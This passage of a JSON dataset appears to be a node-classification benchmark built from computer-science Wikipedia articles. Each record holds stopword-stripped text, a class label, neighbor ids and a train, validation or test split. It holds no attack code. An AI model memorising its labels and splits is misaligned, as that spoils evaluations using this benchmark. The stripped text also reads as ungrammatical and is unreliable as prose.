    "mask": "Validation"
  },
  {
    "node_id": 7366,
    "label": 2,
    "text": "Jean-loup_Gailly:jean-loup gailly jean-loup gailly author gzip wrote compression code portable archiver info-zip tools compatible pkzip archiver ms-dos worked zlib collaboration mark adler prefers write hyphenated first name j l ell capitalized wrote chapter fractal image compression mark nelson data compression book 1990 1995 designed real-time executive chorusos microkernel 1999 2001 cto mandrakesoft 2006 2014 worked google tech lead manager",
    "neighbors": [
      3296,
      10121,
      4780,
      9166,
      4561,
      7187
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7367,
    "label": 9,
    "text": "Saber_(software):saber software saber general purpose simulation program synopsys inc originally developed analogy inc. bought avanti corporation 2000 bought synopsys inc. saber began single-kernel analog simulation technology brought vhdl-ams verilog-ams spice saber-mast language single environment saber coupled digital simulators via calaveris algorithm",
    "neighbors": [
      5881,
      7819,
      11333
    ],
    "mask": "Train"
  },
  {
    "node_id": 7368,
    "label": 4,
    "text": "Authorization:authorization authorization function specifying access rights/privileges resources related information security computer security general access control particular formally authorize define access policy example human resources staff normally authorized access employee records policy usually formalized access control rules computer system operation system uses access control rules decide whether access requests authenticated consumers shall approved granted disapproved rejected resources include individual files item data computer programs computer devices functionality provided computer applications examples consumers computer users computer software hardware computer access control computer systems networks rely access policies access control process divided following phases policy definition phase access authorized policy enforcement phase access requests approved disapproved authorization function policy definition phase precedes policy enforcement phase access requests approved disapproved based previously defined authorizations modern multi-user operating systems include access control thereby rely authorization access control also uses authentication verify identity consumers consumer tries access resource access control process checks consumer authorized use resource authorization responsibility authority department manager within application domain often delegated custodian system administrator authorizations expressed access policies types policy definition application e.g form access control list capability policy administration point e.g xacml basis principle least privilege consumers authorized access whatever need jobs older single user operating systems often weak non-existent authentication access control systems anonymous consumers guests consumers required authenticate often limited authorization distributed system often desirable grant access without requiring unique identity familiar examples access tokens include keys certificates tickets grant access without proving identity trusted consumers often authorized unrestricted access resources system must verified access control system make access approval decision partially trusted guests often restricted authorization order protect resources improper access usage access policy operating systems default grant consumers full access resources others opposite insisting administrator explicitly authorizes consumer use resource even access controlled combination authentication access control lists problems maintaining authorization data trivial often represents much administrative burden managing authentication credentials often necessary change remove user authorization done changing deleting corresponding access rules system using atomic authorization alternative per-system authorization management trusted third party securely distributes authorization information public policy authorization feature trusted systems used security social control banking authorization hold placed customer account purchase made using debit card credit card publishing sometimes public lectures freely available texts published without approval author called unauthorized texts example 2002 'the theory everything origin fate universe collected stephen hawking lectures published without permission per copyright law",
    "neighbors": [
      5636,
      10756,
      9745,
      531,
      2084,
      3629,
      7729,
      10801,
      4663,
      7739,
      3133,
      9791,
      10815,
      10835,
      9313,
      6761,
      107,
      8302,
      9336,
      5245,
      5246,
      9356,
      6805,
      10392,
      6811,
      9884,
      2213,
      7846,
      10918,
      1709,
      7855,
      2737,
      5812,
      3262,
      5325,
      6350,
      2262,
      6360,
      6373,
      6381,
      9966,
      9967,
      755,
      10492,
      5373,
      9488,
      8978,
      4892,
      5404,
      1314,
      8998,
      1327,
      3887,
      7983,
      5433,
      3388,
      10058,
      4435,
      11262,
      7515,
      4956,
      3941,
      4453,
      4979,
      899,
      9607,
      2959,
      3473,
      2975,
      929,
      6563,
      2470,
      939,
      9646,
      1970,
      10677,
      6591,
      3521,
      3525,
      9160,
      6098,
      5077,
      9688,
      2013,
      4575,
      11244,
      5624,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7369,
    "label": 4,
    "text": "Anti-computer_forensics:anti-computer forensics anti-computer forensics sometimes counter forensics general term set techniques used countermeasures forensic analysis anti-forensics recently recognized legitimate field study within field study numerous definitions anti-forensics abound one widely known accepted definitions comes marc rogers purdue university rogers uses traditional crime scene approach defining anti-forensics attempts negatively affect existence amount and/or quality evidence crime scene make analysis examination evidence difficult impossible conduct abbreviated definition given scott berinato article entitled rise anti-forensics anti-forensics technology approach criminal hacking summed like make hard find impossible prove found neither author takes account using anti-forensics methods ensure privacy one personal data anti-forensics methods often broken several sub-categories make classification various tools techniques simpler one widely accepted subcategory breakdowns developed dr. marcus rogers proposed following sub-categories data hiding artifact wiping trail obfuscation attacks cf computer forensics processes tools attacks forensics tools directly also called counter-forensics within field digital forensics much debate purpose goals anti-forensic methods common conception anti-forensic tools purely malicious intent design others believe tools used illustrate deficiencies digital forensic procedures digital forensic tools forensic examiner education sentiment echoed 2005 blackhat conference anti-forensic tool authors james foster vinnie liu stated exposing issues forensic investigators work harder prove collected evidence accurate dependable believe result better tools education forensic examiner also counter-forensics significance defence espionage recovering information forensic tools serves goals spies equally well investigators data hiding process making data difficult find also keeping accessible future use obfuscation encryption data give adversary ability limit identification collection evidence investigators allowing access use common forms data hiding include encryption steganography various forms hardware/software based data concealment different data hiding methods makes digital forensic examinations difficult different data hiding methods combined make successful forensic investigation nearly impossible one commonly used techniques defeat computer forensics data encryption presentation gave encryption anti-forensic methodologies vice president secure computing paul henry referred encryption forensic expert nightmare majority publicly available encryption programs allow user create virtual encrypted disks opened designated key use modern encryption algorithms various encryption techniques programs make data virtually impossible read without designated key file level encryption encrypts file contents leaves important information file name size timestamps unencrypted parts content file reconstructed locations temporary files swap file deleted unencrypted copies encryption programs ability perform number additional functions make digital forensic efforts increasingly difficult functions include use keyfile full-volume encryption plausible deniability widespread availability software containing functions put field digital forensics great disadvantage steganography technique information files hidden within another file attempt hide data leaving plain sight steganography produces dark data typically buried within light data e.g. non-perceptible digital watermark buried within digital photograph experts argued use steganography techniques widespread therefore n't given lot thought experts agree steganography capability disrupting forensic process used correctly according jeffrey carr 2007 edition technical mujahid bi-monthly terrorist publication outlined importance using steganography program called secrets mujahideen according carr program touted giving user capability avoid detection current steganalysis programs use steganography conjunction file compression forms data hiding involve use tools techniques hide data throughout various locations computer system places include memory slack space hidden directories bad blocks alternate data streams hidden partitions one well known tools often used data hiding called slacker part metasploit framework slacker breaks file places piece file slack space files thereby hiding forensic examination software another data hiding technique involves use bad sectors perform technique user changes particular sector good bad data placed onto particular cluster belief forensic examination tools see clusters bad continue without examination contents methods used artefact wiping tasked permanently eliminating particular files entire file systems accomplished use variety methods include disk cleaning utilities file wiping utilities disk degaussing/destruction techniques disk cleaning utilities use variety methods overwrite existing data disks see data remanence effectiveness disk cleaning utilities anti-forensic tools often challenged believe completely effective experts n't believe disk cleaning utilities acceptable disk sanitization base opinions current dod policy states acceptable form sanitization degaussing see national industrial security program disk cleaning utilities also criticized leave signatures file system wiped cases unacceptable widely used disk cleaning utilities include dban srm bcwipe total wipeout killdisk pc inspector cyberscrubs cybercide another option approved nist nsa cmrr secure erase uses secure erase command built ata specification file wiping utilities used delete individual files operating system advantage file wiping utilities accomplish task relatively short amount time opposed disk cleaning utilities take much longer another advantage file wiping utilities generally leave much smaller signature disk cleaning utilities two primary disadvantages file wiping utilities first require user involvement process second experts believe file wiping programs n't always correctly completely wipe file information widely used file wiping utilities include bcwipe r-wipe clean eraser aevita wipe delete cyberscrubs privacysuite disk degaussing process magnetic field applied digital media device result device entirely clean previously stored data degaussing rarely used anti-forensic method despite fact effective means ensure data wiped attributed high cost degaussing machines difficult average consumer afford commonly used technique ensure data wiping physical destruction device nist recommends physical destruction accomplished using variety methods including disintegration incineration pulverizing shredding melting purpose trail obfuscation confuse disorient divert forensic examination process trail obfuscation covers variety techniques tools include log cleaners spoofing misinformation backbone hopping zombied accounts trojan commands one widely known trail obfuscation tools timestomp part metasploit framework timestomp gives user ability modify file metadata pertaining access creation modification times/dates using programs timestomp user render number files useless legal setting directly calling question files credibility another well known trail-obfuscation program transmogrify also part metasploit framework file types header file contains identifying information .jpg would header information identifies .jpg .doc would information identifies .doc transmogrify allows user change header information file .jpg header could changed .doc header forensic examination program operating system conduct search images machine would simply see .doc file skip past anti-forensic tools focused attacking forensic process destroying data hiding data altering data usage information anti-forensics recently moved new realm tools techniques focused attacking forensic tools perform examinations new anti-forensic methods benefited number factors include well documented forensic examination procedures widely known forensic tool vulnerabilities digital forensic examiners heavy reliance tools typical forensic examination examiner would create image computer disks keeps original computer evidence tainted forensic tools hashes created forensic examination software verify integrity image one recent anti-tool techniques targets integrity hash created verify image affecting integrity hash evidence collected subsequent investigation challenged use chassis intrusion detection feature computer case sensor photodetector rigged explosives self-destruction anti-forensic methods rely several weaknesses forensic process including human element dependency tools physical/logical limitations computers reducing forensic process susceptibility weaknesses examiner reduce likelihood anti-forensic methods successfully impacting investigation may accomplished providing increased training investigators corroborating results using multiple tools",
    "neighbors": [
      2818,
      2947,
      3972,
      2437,
      1429,
      7968,
      675,
      5284,
      8997,
      3629,
      11182,
      7983,
      11695,
      7090,
      4789,
      55,
      8635,
      2494,
      830,
      4032,
      831,
      5186,
      1475,
      9289,
      6475,
      7887,
      4049,
      10195,
      6494,
      4834,
      5475,
      7525,
      2534,
      9319,
      11368,
      9086
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7370,
    "label": 8,
    "text": "URL_shortening:url shortening url shortening technique world wide web uniform resource locator url may made substantially shorter still direct required page achieved using redirect links web page long url example url shortened url shortened often redirect domain name shorter original one friendly url may desired messaging technologies limit number characters message example sms reducing amount typing required reader copying url print source making easier person remember intention permalink november 2009 shortened links url shortening service bitly accessed 2.1 billion times uses url shortening beautify link track clicks disguise underlying address although disguising underlying address may desired legitimate business personal reasons open abuse url shortening service providers found spam blacklists use redirect services sites trying bypass blacklists websites prevent short redirected urls posted several reasons use url shortening often regular unshortened links may aesthetically unpleasing many web developers pass descriptive attributes url represent data hierarchies command structures transaction paths session information result urls hundreds characters long contain complex character patterns urls difficult memorize type-out distribute result long urls must copied-and-pasted reliability thus short urls may convenient websites hard copy publications e.g printed magazine book latter often requiring long strings broken multiple lines case e-mail software internet forums truncated twitter instant-messaging services limit number characters message carry however twitter shortens links automatically using url shortening service need use separate url shortening service shorten urls tweet services using url shortener allow linking web pages would otherwise violate constraint shortening services generate urls human-readable although resulting strings longer generated length-optimized service finally url shortening sites provide detailed information clicks link receives simpler setting equally powerful server-side analytics engine unlike latter require access server urls encoded two-dimensional barcodes qr code often shortened url shortener order reduce printed area code allow printing lower density order improve scanning reliability websites create short links make sharing links via instant messaging easier make cheaper send via sms done online web pages url shortening service batch demand may require use api well-known websites set url shortening services use example twitter t.co google g.co godaddy x.co url shortening every long url associated unique key part top-level domain name example key redirection treated equally redirection instruction sent browser contain header http status 301 moved permanently 302 found 307 temporary redirect 308 permanent redirect several techniques implement url shortening keys generated base 36 assuming 26 letters 10 numbers case character sequence alternatively uppercase lowercase letters differentiated character represent single digit within number base 62 26 26 10 order form key hash function made random number generated key sequence predictable users may propose custom keys example shortened protocols capable shortened 2011 although protocols http https ftp ftps mailto mms rtmp rtmpt ed2k pop imap nntp news ldap gopher dict dns addressed services url shortener typically urls supported security reasons combat attacks like xss session hijacking url shortening services support forwarding mailto urls alternative address munging avoid unwanted harvest web crawlers bots may sometimes done using short captcha-protected urls common makers url shorteners usually register domain names less popular esoteric top-level domains order achieve short url catchy name often using domain hacks results registration different url shorteners myriad different countries leaving relation country domain registered url shortener shortened links top-level domains countries libya .ly samoa .ws mongolia .mn malaysia .my liechtenstein .li used well many others cases political cultural aspects country charge top-level domain may become issue users owners usually case services may record inbound statistics may viewed publicly others many providers shortened urls claim never expire always implied small print —there contract breached free service regardless promises — permanent url necessarily good thing security implications obsolete short urls remain existence may circulated long cease point relevant even extant destination sometimes short url useful simply give someone telephone conversation one-off access file download longer needed within couple minutes url shorteners offer time-limited service expire specified period services available include ordinary easy-to-say word url lifetime 5 minutes 24 hours creation url expire specified date specified period creation very-short-lived url 5 characters typing smartphone restriction creator total number uses url password protection microsoft security brief recommends creation short-lived urls reasons explicitly security rather convenience early reference us patent 6957224 describes ... system method computer program product providing links remotely located information network remotely connected computers uniform resource locator url registered server shorthand link associated registered url associated shorthand link url logged registry database request received shorthand link registry database searched associated url shorthand link found associated url url fetched otherwise error message returned patent filed september 2000 patent issued 2005 us patent applications made public within 18 months filing another reference url shortening 2001 first notable url shortening service tinyurl launched 2002 popularity influenced creation least 100 similar websites although simply domain alternatives initially twitter automatically translated urls longer twenty-six characters using tinyurl although began using bit.ly instead 2009 later developed url shortening service t.co 14 august 2009 wordpress announced wp.me url shortener use referring wordpress.com blog post november 2009 shortened links bit.ly accessed 2.1 billion times around time bit.ly tinyurl widely used url-shortening services one service tr.im stopped generating short urls 2009 blaming lack revenue-generating mechanisms cover costs twitter default use bit.ly shortener questioning whether shortening services could profitable url shortening longer term resumed time closed shortest possible long-term urls generated nanourl december 2009 2011 associated top-level .to tonga domain form represents sequence random numbers letters 14 december 2009 google announced service called google url shortener goo.gl originally available use google products google toolbar feedburner extensions google chrome 21 december 2009 google introduced youtube url shortener youtu.be september 2010 google url shortener became available via direct interface goo.gl service provides analytics details qr code generator 30 march 2018 google announced turning support goo.gl coming weeks replacing firebase dynamic links although existing goo.gl links continue function main advantage short link fact short looks neat clean easily communicated entered without error limited extent may obscure destination url though easily discoverable may advantageous disadvantageous irrelevant short link expires terminated security advantages short urls often circumvent intended use top-level domains indicating country origin domain registration many countries requires proof physical presence within country although redirected url guarantee url shortening may utilized spammers illicit internet activities result many removed online registries shut web hosts internet service providers according tonic corporation registry .to domains serious keeping domains spam free may remove url shortening services registry service abused addition u.nu made following announcement upon closing operations google url-shortener discussion group frequently included messages frustrated users reporting specific shortened urls disabled reported spam study may 2012 showed 61 url shorteners shut 614 1002 common cause cited abuse spammers convenience offered url shortening also introduces potential problems led criticism use services short urls example subject linkrot shortening service stops working urls related service become broken legitimate concern many existing url shortening services may sustainable business model long term late 2009 internet archive started 301 works projects together twenty collaborating companies initially whose short urls preserved project shortened internet links typically use foreign country domain names therefore jurisdiction nation libya instance exercised control .ly domain october 2010 shut vb.ly violating libyan pornography laws failure predict problems url shorteners investment url shortening companies may reflect lack due diligence websites prevent short redirected urls posted april 2009 tinyurl reported blocked saudi arabia yahoo answers blocks postings contain tinyurls wikipedia accept links url shortening services articles reddit community strongly discourages subreddits outright bans url shortening services link submissions disguise origin domain name whether link previously submitted reddit legitimate reasons use link shorteners reddit link submissions sites adf.ly use number advertising techniques including interstitial advertising generate revenue may deter readers short url obscures target address used redirect unexpected site examples rickrolling redirecting shock sites affiliate websites short url allow blacklisted urls accessed bypassing site blocks facilitates redirection user blacklisted scam pages pages containing malware xss attacks tinyurl tries disable spam-related links redirecting zonealarm however warned users tinyurl may unsafe website known distribute spyware tinyurl countered problem offering option view link destination using shortened url ability installed browser via tinyurl website requires use cookies destination preview may also obtained prefixing word preview tinyurl url example destination revealed entering url shortening services provide similar destination display security professionals suggest users check short url destination accessing following instance shortening service cli.gs compromised exposing millions users security uncertainties several web applications display destination url shortened url url shortening services filter links bad-site screening services google safe browsing many sites accept user-submitted content block links however certain domains order cut spam reason known url redirection services often added spam blacklists another privacy problem many services shortened url format small enough vulnerable brute-force search many people use url shorteners share links private content fact many web services like google maps offered automatic generation shortened links driving directions reveal personal information like home addresses sensitive destinations like clinics specific diseases including cancer mental diseases addiction treatment centers abortion providers correctional juvenile detention facilities payday car-title lenders gentlemen ’ clubs etc short urls although making easier access might otherwise long url user-space isp server add additional layer complexity process retrieving web pages every access requires requests least one dns lookup though may cached one http/https request thereby increasing latency time taken access page also risk failure since shortening service may become unavailable another operational limitation url shortening services browsers resend post bodies redirect encountered overcome making service reverse proxy elaborate schemes involving cookies buffered post bodies techniques present security scaling challenges therefore used extranets internet-scale services open source commercial scripts also available redirecting shortening links usually written php web application plugin one popular applications wordpress scripts avoid many issues shortening services keep domain name part shortened link made private",
    "neighbors": [
      2049,
      519,
      5641,
      9737,
      10103,
      5012,
      10390,
      1959,
      1206,
      1083,
      1723,
      10815,
      8644,
      9039,
      87,
      8805,
      362,
      1643,
      9712,
      113,
      6002,
      245,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7371,
    "label": 0,
    "text": "BulNet:bulnet bulgarian wordnet bulnet lexical semantic network bulgarian following princeton wordnet pwn framework implements traditional semantic networks whose structure consists nodes relations nodes bulnet started within eu-funded project balkanet multilingual semantic network balkan languages directed construction synchronized semantic databases following balkan languages bulgarian greek romanian serbian turkish expansion czech lexical-semantic network balkanet completion development bulgarian wordnet continued within nationally funded projects bulnet lexical-semantic network bulgarian 2005-2010 language e-resources processing tools 2011-2013 latter co-funded project cesar central south-east european resources information communication technologies policy support programme call cip ict-psp-2010-4 currently bulgarian wordnet comprises 80,000 april 15 2015 synonym sets distributed nine parts speech nouns verbs adjectives adverbs pronouns prepositions conjunctions particles interjections words included bulgarian wordnet selected according different criteria main ones frequency analysis word occurrences large text corpora taking account number occurrences citation forms wordforms well inclusion synsets already featuring wordnets languages synsets correspond high-frequency word senses found parallel corpora synonym set synset encodes relation equivalence number lexical items literals least one explicitly represented synset unique meaning specified value sense pertain one part speech specified value pos represent one lexical meaning specified value def synset linked counterpart pwn 3.0 means unique identification number id common synsets balkan languages marked common concepts subsets bcs monolingual database synset linked least one synset intralingual relation non-obligatory information may also encoded examples usage stylistic peculiarities morphological syntactic properties author last edit details large number relations encoded bulgarian wordnet effectively illustrates language semantic derivational richness offers diverse opportunities numerous applications multilingual database bulgarian electronic semantic database offers linguistic solutions semantic level options synonym selection queries semantic relations word language lexical system antonymy holonymy etc explanatory definition queries translation equivalents lexical item bulgarian wordnet electronic multilingual dictionary synonym sets along explanatory definitions sets semantic relations words language hydra os-independent system designed wordnet development validation exploration program enables users browse edit number monolingual wordnets time individual wordnets synchronised equivalent synonym sets synsets may viewed explored parallel",
    "neighbors": [
      416,
      4469
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7372,
    "label": 9,
    "text": "JavaPoly:javapoly javapoly library polyfills native jvm support within modern web browser allows websites import java libraries call directly javascript even user java installed computer unlike gwt teavm attempt compile subset java javascript javapoly actually executes java bytecode instructions means javapoly run almost java library including libraries use threads shared memory locking primitives 64-bit integers javapoly designed optimize performance taking advantage native jvms available running node.js javapoly always use native jvm thereby utilize native capabilities like multi-core support otherwise unavailable javascript applications similarly javapoly take advantage native java support within web browser support available suitable alternatives detected javapoly call doppio vm provides execution support legacy browsers",
    "neighbors": [
      803,
      3462,
      6797,
      7983,
      5872,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7373,
    "label": 8,
    "text": "Open_Power_Template:open power template open power template web template engine written php 5 common strategy designing web application separation application logic i.e data processing presentation displaying data opt tool implementing separation presentation layer represented templates text files html code extra instructions controlling data substitution opt uses dedicated xml template language writing templates general-purpose domain-specific language primarily designed support simplify template-specific problems set declarative instructions instead implementing rendering algorithms statements like imperative programming template designer specifies expected result features aims ease costs efforts associated software development maintenance library provides object-oriented api based solutions popular frameworks first member bigger project open power libs built upon small opl core library provides basic features project started november 2004 template engine discussion board project inspired smarty later failed library became independent july 2006 version 1.0.0 released offered template language smarty-like syntax small set declarative instructions january 2007 developers release version 1.1.0 brings notable improvements pagination support tree rendering january 2008 developers form open-source programming team invenzzia develop opt php projects time development open power template 2.0 began last version 1.1 branch released may 2008 group focused opt 2.0 development new library went beta-stage december first stable version released july 2009 opt 2.0 template language xml application allows manipulate xhtml document structure features built-in xml parser reconfigured parse certain html documents plain text content since templates separated application logic need least two files first one contains presentation code xml template second one generates data configures library",
    "neighbors": [
      8644,
      4198,
      9926,
      9320,
      7658,
      7627,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7374,
    "label": 9,
    "text": "PrimeFaces:primefaces primefaces open-source user interface ui component library javaserver faces-based applications created turkish company primetek informatics initial development primefaces started late 2008 predecessor primefaces yui4jsf library set jsf components based yui javascript library yui4jsf got cancelled favor primefaces early 2009 since release primefaces strongly supported oracle particularly within netbeans world packt publishing publish books technology",
    "neighbors": [
      6338,
      1802,
      5612,
      5677,
      7983,
      1910,
      10526
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7375,
    "label": 2,
    "text": "Bootsplash:bootsplash bootsplash also known bootscreen graphical representation boot process operating system bootsplash simple visualisation scrolling boot messages console also present graphics combinations unlike splash screens bootsplash necessarily designed marketing purposes enhance experience user eye candy provide user messages added advantage color-coding facility diagnose state system versions microsoft windows feature boot screen loaded startup process extra third-party utilities possible replace default windows boot screen custom images text and/or animations windows vista default boot screen represented green indeterminate progress indicator boot screen changed displays static image aurora text starting windows vista enabling gui boot option within windows system configuration utility msconfig.exe microsoft would update aurora image throughout lifecycle operating system starting first service pack altered match image displayed operating system hibernation screen windows 7 change boot screen although possible third-party utilities extremely risky may cause system unable boot also hidden aurora bootscreen removed",
    "neighbors": [
      7106,
      3109,
      6055,
      7983,
      8112,
      9455,
      6771,
      11095,
      3033,
      3867,
      9693,
      3550,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 7376,
    "label": 5,
    "text": "FreeS/WAN:frees/wan frees/wan free secure wide-area networking free software project implemented reference version ipsec network security layer linux project goal ubiquitous opportunistic encryption internet traffic realized although contribute general internet encryption project founded john gilmore administered duration hugh daniel john ioannidis angelos keromytis started codebase outside united states america prior autumn 1997 technical lead project henry spencer later michael richardson ike keying daemon pluto maintained d. hugh redelmeier ipsec kernel module klips maintained richard guy briggs sandy harris main documentation person project later claudia schmeing final frees/wan version 2.06 released 22 april 2004 earlier version 2.04 forked form two projects openswan strongswan openswan since 2012 forked libreswan",
    "neighbors": [
      3206,
      10889,
      9722,
      3731,
      8211,
      11162,
      3742,
      9764,
      939,
      4268,
      7983,
      10417,
      7859,
      2228,
      823,
      3777,
      2884,
      5959,
      8265,
      11468,
      11606,
      2136,
      9048,
      6490,
      6364,
      5084,
      10210,
      9318,
      8039,
      11248,
      5749,
      3322
    ],
    "mask": "Test"
  },
  {
    "node_id": 7377,
    "label": 4,
    "text": "System_Management_Mode:system management mode system management mode smm sometimes called ring -2 reference protection rings operating mode x86 central processor units cpus normal execution including operating system suspended alternate software system usually resides computer firmware hardware-assisted debugger executed high privileges first released intel 386sl initially special sl versions required smm intel incorporated smm mainline 486 pentium processors 1993 amd implemented intel smm am386 processors 1991 available later microprocessors x86 architecture smm special-purpose operating mode provided handling system-wide functions like power management system hardware control proprietary oem designed code intended use system firmware applications software general-purpose systems software main benefit smm offers distinct easily isolated processor environment operates transparently operating system executive software applications order achieve transparency smm imposes certain rules smm entered smi system management interrupt processor executes smm code separate address space made inaccessible operating modes cpu firmware initially system management mode used implementing advanced power management apm features however time bios manufacturers relied smm functionality like making usb keyboard work real mode uses system management mode system management mode also abused run high-privileged rootkits demonstrated black hat 2008 2015 smm entered via smi system management interrupt invoked entering smm processor looks first instruction address smbase smbase register content 8000h default 38000h using registers cs 3000h eip 8000h cs register value 3000h due use real mode memory addresses processor smm case cs internally appended 0h rightmost end design operating system override disable smi due fact target malicious rootkits reside including nsa implants individual code names specific hardware like souffletrough juniper networks firewalls j-series routers company dell hp proliant servers improperly designed insufficiently tested smm bios code make wrong assumptions work properly interrupting modes like pae 64-bit long mode according documentation linux kernel around 2004 buggy implementations usb legacy support feature common cause crashes example motherboards based intel e7505 chipset since smm code smi handler installed system firmware bios os smm code may expectations hardware settings incompatible different ideas advanced programmable interrupt controller apic set operations smm take cpu time away applications operating system kernel hypervisor effects magnified multicore processors since smi causes cores switch modes also overhead involved switching smm since cpu state must stored memory smram write-back caches must flushed destroy real-time behavior cause clock ticks get lost windows linux kernels define ‘ smi timeout ’ setting period within smm handlers must return control operating system ‘ hang ’ ‘ crash ’ smm may disrupt behavior real-time applications constrained timing requirements logic analyzer may required determine cpu entered smm checking state smiact pin cpu recovering smi handler code analyze bugs vulnerabilities secrets requires logic analyzer disassembly system firmware",
    "neighbors": [
      9366,
      11550,
      7983,
      565,
      7354,
      2811,
      9791,
      6596,
      6730,
      9932,
      4695,
      5080,
      4444,
      3294,
      1247,
      2275,
      1515,
      1776,
      499,
      1143,
      1915,
      1660,
      255
    ],
    "mask": "None"
  },
  {
    "node_id": 7378,
    "label": 6,
    "text": "Xsan:xsan xsan apple inc. storage area network san clustered file system macos xsan enables multiple mac desktop xserve systems access shared block storage fibre channel network xsan file system installed computers read write storage volume time xsan complete san solution includes metadata controller software file system client software integrated setup management monitoring tools xsan normal features expected enterprise shared disk file system including support large files file systems multiple mounted file systems meta data controller failover fault tolerance support multiple operating systems xsan based stornext file system made quantum corporation stornext file system xsan file system share file system layout protocol talking meta data server also seem share common code base close development based new features developed file systems xsan website claims complete interoperability stornext file system xsan completely interoperable quantum ’ stornext file system even provide clients windows linux unix platforms direct fibre channel block-level access data xsan-managed storage pool quantum corporation claims complete interoperability apple ’ xsan promise raid allows xsan xserve raid support aix hp-ux irix red hat linux suse linux mac os x solaris windows clients including support 64 bit windows windows vista command line tools xsan begin letters cv stand centravision – original name file system xsan clients use tcp ports 49152–65535 tcp/63146 frequently showing log files xsan file system uses several logical storages distribute information two main classes information appear xsan user data files file system metadata folders file names file allocation information configurations use different storages data metadata file system supports dynamic expansion distribution data metadata areas january 4 2005 apple announced shipping xsan may 2006 apple released xsan 1.2 support volume sizes nearly 2 petabytes august 7 2006 apple announced xsan 1.4 available intel-based macintosh computers universal binary supports file system access control lists december 5 2006 apple released xsan 1.4.1 october 18 2007 apple released xsan 1.4.2 resolves several reliability compatibility issues february 19 2008 apple released xsan 2 first major update introduces multisan completely redesigned administration tools 2.1 introduced june 10 2008 2.1.1 introduced october 15 2008 2.2 released september 14 2009 july 20 2011 apple released xsan 2.3 included mac os x lion first version xsan included macos august 25 2011 apple released xsan 2.2.2 brought along several reliability fixes july 25 2012 apple released xsan 3 included os x mountain lion october 17 2014 apple released xsan 4 os x yosemite september 20 2016 apple released xsan 5 macos sierra macos server 5.2",
    "neighbors": [
      5120,
      10755,
      9732,
      1549,
      3598,
      4111,
      6669,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      6186,
      6700,
      8754,
      9784,
      11323,
      576,
      5696,
      8772,
      1623,
      3167,
      3681,
      4708,
      2149,
      3691,
      9836,
      7789,
      9333,
      6263,
      6264,
      9335,
      7292,
      2686,
      7806,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      7318,
      2199,
      5784,
      4251,
      3228,
      11419,
      6309,
      1190,
      5286,
      168,
      10405,
      10406,
      171,
      11430,
      3248,
      7344,
      2230,
      5816,
      1212,
      8380,
      6654,
      6855,
      10951,
      9420,
      3790,
      3795,
      4819,
      8404,
      3286,
      728,
      8410,
      6365,
      4318,
      7907,
      231,
      6377,
      2282,
      8938,
      4844,
      9451,
      10478,
      1263,
      3312,
      3826,
      2291,
      246,
      7928,
      8441,
      3834,
      3328,
      11012,
      2314,
      8461,
      9999,
      6416,
      6935,
      4888,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      9004,
      302,
      7983,
      6961,
      2363,
      2365,
      2366,
      9022,
      1346,
      3909,
      838,
      2378,
      4431,
      346,
      2395,
      2397,
      6495,
      865,
      10596,
      9063,
      10602,
      3948,
      10608,
      6519,
      376,
      11128,
      890,
      7554,
      2948,
      6023,
      6539,
      8075,
      11675,
      414,
      2974,
      7070,
      9123,
      11171,
      4012,
      1454,
      6062,
      8114,
      7603,
      1464,
      1978,
      8643,
      7126,
      7133,
      4068,
      1509,
      5093,
      9189,
      8170,
      7154,
      5619,
      11256,
      11257,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 7379,
    "label": 3,
    "text": "CDemu:cdemu cdemu free open-source virtual drive software designed emulate optical drive optical disc including cd-roms dvd-roms linux operating system cdemu available official repositories debian ubuntu fedora linux release available via official ppa ubuntu copr fedora linux cdemu consists software portable operating systems supported glib exceptions kernel module clients rely d-bus communication cdemu originally designed robert penz justus schwartz patch mplayer allowed mounting .cue/.bin files patch completed realized simplicity wrote module linux kernel originally cdemu named virtual cd name previously trademarked owners trademark requested use name june 2007 development cdemu 0.8 ceased rewrite developed instead work done rok mandeljc new version cdemu took another approach emulation much possible userspace june 2008 considered mostly stable version 2.0.0 cdemu supports following image formats emulator endeavors follow mmc-3 standard scsi optical drives closely possible ensuring realistic accurate emulation optical media emulated cdemu mounted within linux cdemu support cd subchannels cd-text isrc，mcn ecc/edc dpm/rmps also support limited number encrypted compressed image formats developers working supporting many major formats encourage users submit patches end alternative linux programs available repositories debian ubuntu fedora linux",
    "neighbors": [
      10016,
      451,
      4615,
      10857,
      5612,
      6797,
      6062,
      7983,
      3760,
      10476,
      11568,
      5397,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 7380,
    "label": 4,
    "text": "Deep_Freeze_(software):deep freeze software deep freeze faronics software application available microsoft windows macos operating systems allows system administrators protect core operating system configuration files workstation server restoring computer back saved configuration time computer restarted also known reboot restore software deep freeze also protect computer harmful malware since automatically deletes rather longer sees downloaded files computer restarted advantage using deep freeze uses system resources thus slow computer performance greatly disadvantage provide real-time protection therefore infected computer would restarted order remove malware deep freeze protects workstations fresh-booted state deep freeze prevents permanent tampering protected hard drives/partitions across reboots user activity restarts limited program example deep freeze prevent application installation user install modified version web browser seemingly harmless unknowing user designed secretly send users passwords server connected internet workaround deep freeze configured restart user logout shutdown chosen period inactivity restart/shutdown scheduled time attempt ensure installations retained rebooting system returns system original unmodified state deep freeze protect operating system hard drive upon installed computer booted another medium another bootable partition internal hard drive external hard drive usb device optical media network server cases user would real access contents supposedly frozen system windows-based computer scenario may prevented configuring cmos nonvolatile bios memory workstation boot hard drive protected password-protecting cmos normal precaution public access computers precaution would lock pc case shut physical lock tiedown cable system prevent access motherboard jumpers deep freeze protect hard drive partitions larger 2 tb capacity using ntfs",
    "neighbors": [
      5411,
      8197,
      6797,
      7983,
      2193,
      8572,
      5018,
      7515,
      3484,
      925
    ],
    "mask": "Test"
  },
  {
    "node_id": 7381,
    "label": 4,
